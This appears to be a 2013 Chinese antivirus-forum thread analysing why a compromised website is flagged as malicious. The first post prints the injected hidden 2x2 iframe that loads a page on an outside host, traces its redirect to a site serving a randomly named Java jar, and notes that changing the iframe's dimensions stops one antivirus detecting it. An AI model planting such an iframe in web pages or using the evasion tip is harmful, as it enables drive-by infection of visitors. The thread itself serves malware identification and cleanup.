查看: 757|回复: 3
收起左侧

[已鉴定] http://discountsmokelesscigarettes.com/

 关闭 [复制链接]
dayangyang
发表于 2013-4-23 23:27:27 | 显示全部楼层 |阅读模式
这个网页报毒的原因是最后一句:
  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://greggauthier.com/aazd.html?i=3294538></iframe></body>
  2. </html>
复制代码
这段代码 应该已经被杀毒软件认为是木马的特征码
如果有兴趣,可以单独把这段代码拷入txt中,然后改后缀名为com看看杀毒软件的反应
然后再随便改下高宽数值,eset就不会报了

当然杀软这样报是有原因的= =因为这就是个马:

先看看这个greggauthier.com/aazd.html?i=3294538
运行后发现是一个跳转--到http://goxserv.com/aazd.html?i=3294538
会要求运行JAVA插件。。里面有一个jar程序。。但是这个jar程序的名称是随机的,如4ag.jar,x01.jar等等

另外就是这段代码在被挂马主页上是自动生成的。就算管理员删了还是会有。。需要删除网站目录下另外一个注入程序

参考:
http://blog.sucuri.net/2013/02/large-scale-compromises-leading-to-tds.html
http://wewatchyourwebsite.com/wordpress/2013/02/twitter-iframes/

评分

参与人数 1经验 +30 收起 理由
蓝核 + 30 感谢支持,欢迎常来: )

查看全部评分

蓝核
发表于 2013-4-24 00:03:55 | 显示全部楼层
我跟你的思路不一样……我么有细究那么多……我只知道这个不应该出现,话说4月23号晚上墨家小子的毒网建议去试试
dayangyang
 楼主| 发表于 2013-4-24 00:48:52 | 显示全部楼层
蓝核 发表于 2013-4-24 00:03
我跟你的思路不一样……我么有细究那么多……我只知道这个不应该出现,话说4月23号晚上墨家小子的毒网建议去 ...

这个就是那里面的一个。。。刚才又解了一个。。。
蓝核
发表于 2013-4-24 00:53:59 | 显示全部楼层
泪。。。这个网站我记得是我这边打不开。。。你加油,明天早上该有的辛苦费不会少
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 20:01 , Processed in 0.247193 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表